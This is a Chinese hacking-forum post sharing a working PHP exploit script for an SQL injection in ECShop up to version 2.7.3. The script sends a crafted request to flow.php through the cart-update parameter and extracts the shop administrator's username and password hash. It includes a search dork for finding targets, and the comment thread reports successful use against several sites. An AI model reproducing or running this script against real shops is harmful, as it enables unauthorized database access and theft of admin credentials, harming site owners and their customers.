ECShop <= v2.7.3 SQL injection / exploit

2012-10-10 00:21:29 20 xiaoxiaoabc 6818 1

好像是最新的

<?php

print_r('

+---------------------------------------------------------------------------+

ECShop <= v2.7.3 SQL injection /  exploit

by 帅的一塌糊涂

mail: hiqiushuiabc gmail dot com

team: [url]http://hi.baidu.com/w5r2[/url]

dork: "Powered by ECShop"

+---------------------------------------------------------------------------+

');

if ($argc < 3) {

    print_r('

+---------------------------------------------------------------------------+

Usage: php '.$argv[0].' host path

host:      target server (ip/hostname)

path:      path to ecshop

Example:

php '.$argv[0].' localhost /ecshop/

+---------------------------------------------------------------------------+

');

    exit;

}

error_reporting(7);

ini_set('max_execution_time', 0);



$host = $argv[1];

$path = $argv[2];



$str = send();

if ( $str){

preg_match('/ouou~(.*?)~1/', $str, $arr);

$result=explode("-",$arr[1]);

if($result[0]=="")

{

print_r("Exploit Failed! \n");

}

else

{

print_r("Exploit Success! \nusername:".$result[0]."\npassword:".$result[1]."\n");

}

}

function send()

{

    global $host, $path;



    $cmd ='step=update_cart&goods_number[-111%27%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20concat(0x6F756F757E,user_name,0x2D,password,0x7E31)%20FROM%20ecs_admin_user%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)#]=2';



    $data = "POST ".$path."flow.php  HTTP/1.1\r\n";

    $data .= "Accept: */*\r\n";

    $data .= "Accept-Language: zh-cn\r\n";

    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";

    $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";

    $data .= "Host: $host\r\n";

    $data .= "Content-Length: ".strlen($cmd)."\r\n";

    $data .= "Connection: Close\r\n\r\n";

    $data .= $cmd;



    $fp = fsockopen($host, 80);

    fputs($fp, $data);



    $resp = '';



    while ($fp && !feof($fp))

        $resp .= fread($fp, 1024);



    return $resp;

echo $resp;

}



?>

类别 Web安全

关于作者

xiaoxiaoabc68篇文章777篇回复

function flow_update_cart($arr) { foreach ($arr AS $key => $val) { $val = intval(make_semiangle($val)); if ($val <= 0 && !is_numeric($key)) //$val大于零就轻松跳过这里 { continue; } $sql = "SELECT `goods_id`, `goods_attr_id`, `product_id`, `extension_code` FROM" .$GLOBALS['ecs']->table('cart'). " WHERE rec_id='$key' AND session_id='" . SESS_ID . "'"; $goods = $GLOBALS['db']->getRow($sql);

评论20次

要评论？请先登录或注册

20楼

joli
2012-12-25 11:49

成功了好几个，顶一下~~~~~~~~~~

回复|@ta|踩(0)|顶(0)
19楼

kim
2012-12-23 22:58

还是成功好几个的

回复|@ta|踩(0)|顶(0)
18楼

charlie
2012-12-23 17:27

要看人品爆发才能利用。、

回复|@ta|踩(0)|顶(0)
17楼

sw0rder1
2012-10-25 12:00

off 我试过了可以使用，这个跟配置还是有关xi

回复|@ta|踩(0)|顶(0)
16楼

咖啡000
2012-10-14 10:15

我是被首页图片xi引进来的

回复|@ta|踩(0)|顶(0)
15楼

0secin
2012-10-13 19:22

为什么你们总是赖不住空虚尼。。。。。。还没怎么玩这洞子就被公开了。。。

回复|@ta|踩(0)|顶(0)
14楼

vimeo
2012-10-12 13:08

靠！，，，，，，，，，原来黑客除了日站，还有副业，开黄网！！！！！！

回复|@ta|踩(0)|顶(0)
13楼

Calm
2012-10-12 11:43

回复|@ta|踩(0)|顶(0)
12楼

1943
2012-10-12 09:17

你那个blog真是害人啊。。貌似tools就你最活跃，xi望多看到新作品啊

回复|@ta|踩(0)|顶(0)
11楼

冰封
2012-10-10 20:48

老漏洞了只是官方没补，几个月前自己也发现了网上一查发现早在2010年大牛们就发现了 http://hi.baidu.com/xhmln9/item/775416085695c5163b53ee72

回复|@ta|踩(0)|顶(0)
10楼

妖妖灵
2012-10-10 16:34

我没成功过

回复|@ta|踩(0)|顶(0)
9楼

东兰sky
2012-10-10 15:39

好东西，支持。

回复|@ta|踩(0)|顶(0)
8楼

leehenwu
2012-10-10 12:36

off 的时候确实可以

回复|@ta|踩(0)|顶(0)
7楼

xiaoxiaoabc
2012-10-10 12:33

确实很鸡肋。

回复|@ta|踩(0)|顶(0)
6楼

bylucifer
2012-10-10 10:38

php6 取消GPC？

回复|@ta|踩(0)|顶(0)
5楼

gmm
2012-10-10 09:57

黑阔被误解了 0.0

回复|@ta|踩(0)|顶(0)
4楼

yzx65
2012-10-10 08:54

确实有点鸡肋，随手试了下，没一个成功

回复|@ta|踩(0)|顶(0)

3楼

alibaba

2012-10-10 01:53

这个漏洞确实存在，只是有点鸡肋必须是magic_quotes_gpc = off 而最新版本的2.7.3虽然做了一些过滤，但是看到那个过滤我笑了

回复|@ta|踩(0)|顶(0)

2楼

xiaoxiaoabc
2012-10-10 01:14

声明下，90sec那个hup是我。。。！！！，不想过多解释！

回复|@ta|踩(0)|顶(0)
1楼

Rices
2012-10-10 00:27

是上次乌云发那个吧在gpc没开的情况下 ecshop只过滤了value 而没过滤key 所以注射产生我以前读的时候也发现几个类似的key注射不过没在意因为当时我gpc是打开状态所以各位黑客使劲挖吧

回复|@ta|踩(0)|顶(0)

ECShop <= v2.7.3 SQL injection / exploit

关于作者

评论20次

成功了好几个，顶一下~~~~~~~~~~

还是成功好几个的

要看人品爆发才能利用。、

off 我试过了可以使用，这个跟配置还是有关xi

我是被首页图片xi引进来的

为什么你们总是赖不住空虚尼。。。。。。 还没怎么玩这洞子 就被公开了。。。

靠！，，，，，，，，，原来黑客除了日站，还有副业，开黄网！！！！！！

你那个blog真是害人啊。。 貌似tools就你最活跃，xi望多看到新作品啊

老漏洞了 只是官方没补，几个月前 自己也发现了 网上一查 发现早在2010年大牛们就发现了 http://hi.baidu.com/xhmln9/item/775416085695c5163b53ee72

我没成功过

好东西，支持。

off 的时候确实可以

确实很鸡肋。

php6 取消GPC？

黑阔被误解了 0.0

确实有点鸡肋，随手试了下，没一个成功

声明下，90sec那个hup是我。。。！！！，不想过多解释！

是上次乌云发那个吧 在gpc没开的情况下 ecshop只过滤了value 而没过滤key 所以注射产生 我以前读的时候也发现几个类似的key注射 不过没在意 因为当时我gpc是打开状态 所以各位黑客使劲挖吧

热门文章

安全资讯Godzilla 无文件后门利用 Atlassian Confluence漏洞 CVE-2023-22527

安全资讯致数千人伤亡的寻呼机为何能爆炸？专家：或黑客入侵致电池过载，或内部被对手安装了爆炸物

渗透测试车联网攻击链路图

安全资讯黑客入侵自行车：无线换档系统存在漏洞

最新回复

精华推荐

手机无线我是如何随时随地控制全校宿舍楼大门的

渗透测试JAVA安全 | Classloader：理解与利用一篇就够了

Web安全DedeCMS最新通杀注入之二(buy_action.php)漏洞分析(更新附exp）

渗透测试window应急响应及实战演练

渗透测试postgres注入总结

为什么你们总是赖不住空虚尼。。。。。。还没怎么玩这洞子就被公开了。。。

你那个blog真是害人啊。。貌似tools就你最活跃，xi望多看到新作品啊

老漏洞了只是官方没补，几个月前自己也发现了网上一查发现早在2010年大牛们就发现了 http://hi.baidu.com/xhmln9/item/775416085695c5163b53ee72

是上次乌云发那个吧在gpc没开的情况下 ecshop只过滤了value 而没过滤key 所以注射产生我以前读的时候也发现几个类似的key注射不过没在意因为当时我gpc是打开状态所以各位黑客使劲挖吧